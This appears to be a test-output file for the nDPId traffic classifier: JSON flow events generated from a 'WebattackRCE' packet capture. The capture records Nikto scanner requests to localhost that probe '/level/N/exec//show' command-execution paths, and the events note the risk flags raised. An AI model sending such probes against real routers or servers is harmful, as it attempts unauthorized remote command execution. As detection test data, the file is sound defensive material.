-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 